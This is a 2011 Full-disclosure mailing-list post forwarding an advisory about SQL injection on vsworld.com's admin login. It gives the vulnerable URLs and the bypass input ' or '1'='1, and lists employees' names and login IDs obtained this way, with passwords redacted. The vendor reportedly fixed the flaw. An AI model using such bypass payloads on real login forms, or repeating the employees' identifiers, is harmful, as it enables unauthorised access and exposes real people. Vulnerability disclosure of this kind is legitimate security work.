[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Re: [Full-disclosure] vsworld.com - SQL Injection Vulnerability

To: full-disclosure@xxxxxxxxxxxxxxxxx
Subject: Re: [Full-disclosure] vsworld.com - SQL Injection Vulnerability
From: "Rakesh Nagekar" <nagekar.rakesh@xxxxxxxxx>
Date: Thu, 20 Jan 2011 07:18:25 +0100 (CET)


Good to know that isolution members find the vulnerabilities in most of the 
websites.Great India.

But sorry to say that their own websites related to 
http://www.isolutionindia.com/ are more vulnerable. 
can you please check it once.

Regards,
Rakesh...

---------- Forwarded message ----------
From: Rakesh Nagekar <nagekar.rakesh@xxxxxxxxx>
Date: Wed, Jan 19, 2011 at 5:04 PM
Subject: vsworld.com - SQL Injection Vulnerability
To: full-disclosure@xxxxxxxxxxxxxxxxx


vsworld - SQL Injection Vulnerability
http://www.thehackerslibrary.com/?p=979

Profile:
Developing solutions for areas as diverse as technology, trading, power, 
travel, education and retail. In addition, regularly called upon to cater to 
the requirements of prestigious Government Bodies. Various prestigious clients 
are in Client list.

Vendor URL:http://www.vsworld.com/index.php

Vulnerability Type : SQL Injection

Vulnerable URL:
http://www.vsworld.com/index.php/en/admin-login.html
&
http://www.vsworld.com/index.php =>VSM Login

User Name: NIL
Password: ' or '1'='1

Now, login to the Control Panel.

Effect: You have access to the main admin panel. Option to View, delete & update
all client records, contact information, Email ids etc.

All employees personal information Contact no, address mail ids etc, theire 
login credentials passwords are visible.

Name: Venkatesh
ID:   venky
Pwd:  ----

Name: sangeeta
ID:   sangeeta
Pwd:  --------

Name: Ramkishan
ID:   VSMlHN23
Pwd  : -------

Name: Vikas
ID:   vsm_vik1
Pwd:  -------

Name: Vijay
ID:   vsm_vij
Pwd:  ------------

Name: X_Harish
ID:   vsm_hari
Pwd:  --------------

and more.......
passwords are not mentioned here for security reasons.

As the vulnerability is of most common type, notified to the vendor and he has 
applied a fix.

Credit: Pradip Sharma, Sandeep Sengupta
Cyber Security Research Analysts, iSolution Software Systems Pvt. Ltd. 
www.isolutionindia.com

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Prev by Date: [Full-disclosure] Taking advantage of File Descriptor exhaustion bugs
Next by Date: [Full-disclosure] [USN-1046-1] Sudo vulnerability
Previous by thread: Re: [Full-disclosure] vsworld.com - SQL Injection Vulnerability
Next by thread: [Full-disclosure] [TOOL] w3af 1.0-rc5 release: Better, Stronger, Faster.
Index(es):
- Date
- Thread